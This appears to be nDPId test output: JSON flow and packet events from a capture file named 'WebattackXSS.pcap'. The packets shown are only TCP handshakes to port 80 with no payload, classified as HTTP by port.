-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9297,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":656,"flow_packet_id":1,"flow_last_seen":1499348090129,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348090129,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8nGpAAD4GKWasEAABwKgKMowQAFDWkax4AAAAAKACchAeSgAAAgQFtAQCCAoBPTASAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9298,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":656,"flow_packet_id":2,"flow_last_seen":1499348090129,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348090129,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjBAuWbjG1pGseaAScSAynQAAAgQFtAQCCAoD5wGFAT0wEgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":656,"flow_packet_id":3,"flow_last_seen":1499348090130,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348090130,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0nGtAAD4GKW2sEAABwKgKMowQAFDWkax5Llm4x4AQAOXRpAAAAQEICgE9MBID5wGF"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9306,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348091413,"flow_last_seen":1499348091413,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091413,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35870,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9306,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":657,"flow_packet_id":1,"flow_last_seen":1499348091413,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348091413,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8nrdAAD4GJxmsEAABwKgKMoweAFAj3q\/lAAAAAKACchDMQQAAAgQFtAQCCAoBPTFTAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9307,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":657,"flow_packet_id":2,"flow_last_seen":1499348091413,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348091413,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjB4dm6koI96v5qAScSD\/rwAAAgQFtAQCCAoD5wLGAT0xUwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9308,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":657,"flow_packet_id":3,"flow_last_seen":1499348091414,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348091414,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0nrhAAD4GJyCsEAABwKgKMoweAFAj3q\/mHZupKYAQAOWetwAAAQEICgE9MVMD5wLG"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347965133,"flow_last_seen":1499347970889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34548,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347965133,"flow_last_seen":1499347970889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34548,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347966420,"flow_last_seen":1499347971889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34562,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347966420,"flow_last_seen":1499347971889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34562,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347967724,"flow_last_seen":1499347972889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34576,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347967724,"flow_last_seen":1499347972889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34576,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347970267,"flow_last_seen":1499347975890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34602,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347970267,"flow_last_seen":1499347975890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347971560,"flow_last_seen":1499347976891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34616,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347971560,"flow_last_seen":1499347976891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34616,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347974113,"flow_last_seen":1499347979891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34642,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347974113,"flow_last_seen":1499347979891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34642,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9318,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348092675,"flow_last_seen":1499348092675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348092675,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35884,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9318,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":658,"flow_packet_id":1,"flow_last_seen":1499348092675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348092675,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8WzpAAD4GapasEAABwKgKMowsAFACaGm0AAAAAKACchAyoAAAAgQFtAQCCAoBPTKOAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9319,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":658,"flow_packet_id":2,"flow_last_seen":1499348092675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348092675,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjCznHw5PAmhptaAScSA2JwAAAgQFtAQCCAoD5wQCAT0yjgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9320,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":658,"flow_packet_id":3,"flow_last_seen":1499348092676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348092676,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0WztAAD4Gap2sEAABwKgKMowsAFACaGm15x8OUIAQAOXVLgAAAQEICgE9Mo4D5wQC"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9336,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348095258,"flow_last_seen":1499348095258,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348095258,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35910,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9336,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":659,"flow_packet_id":1,"flow_last_seen":1499348095258,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348095258,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8kglAAD4GM8esEAABwKgKMoxGAFCLy6cdAAAAAKACchBpMwAAAgQFtAQCCAoBPTUUAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9337,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":659,"flow_packet_id":2,"flow_last_seen":1499348095258,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348095258,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjEYHlr2li8unHqAScSCaZwAAAgQFtAQCCAoD5waIAT01FAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9338,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":659,"flow_packet_id":3,"flow_last_seen":1499348095259,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348095259,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0kgpAAD4GM86sEAABwKgKMoxGAFCLy6ceB5a9poAQAOU5bwAAAQEICgE9NRQD5waI"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9348,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348096595,"flow_last_seen":1499348096595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348096595,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35924,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9348,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":660,"flow_packet_id":1,"flow_last_seen":1499348096595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348096595,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gtxAAD4GQvSsEAABwKgKMoxUAFDl8LS+AAAAAKACchAAEQAAAgQFtAQCCAoBPTZiAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9349,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":660,"flow_packet_id":2,"flow_last_seen":1499348096595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348096595,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjFQs5xqq5fC0v6AScSCtoQAAAgQFtAQCCAoD5wfWAT02YgEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":660,"flow_packet_id":3,"flow_last_seen":1499348096595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348096595,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gt1AAD4GQvusEAABwKgKMoxUAFDl8LS\/LOcaq4AQAOVMqQAAAQEICgE9NmID5wfW"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9369,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348099359,"flow_last_seen":1499348099359,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099359,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35950,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9369,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":661,"flow_packet_id":1,"flow_last_seen":1499348099359,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348099359,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8tSBAAD4GELCsEAABwKgKMoxuAFCNr4w1AAAAAKACchB+DgAAAgQFtAQCCAoBPTkVAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9370,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":661,"flow_packet_id":2,"flow_last_seen":1499348099359,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348099359,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjG7WE+F5ja+MNqAScSC47wAAAgQFtAQCCAoD5wqJAT05FQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9371,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":661,"flow_packet_id":3,"flow_last_seen":1499348099360,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348099360,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0tSFAAD4GELesEAABwKgKMoxuAFCNr4w21hPheoAQAOVX9wAAAQEICgE9ORUD5wqJ"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347975371,"flow_last_seen":1499347980892,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34656,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347975371,"flow_last_seen":1499347980892,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34656,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347976658,"flow_last_seen":1499347981892,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34670,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347976658,"flow_last_seen":1499347981892,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34670,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347979251,"flow_last_seen":1499347984894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34696,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347979251,"flow_last_seen":1499347984894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34696,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347980524,"flow_last_seen":1499347985894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34710,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347980524,"flow_last_seen":1499347985894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34710,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347981782,"flow_last_seen":1499347986894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34724,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347981782,"flow_last_seen":1499347986894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34724,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347983061,"flow_last_seen":1499347988894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34738,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 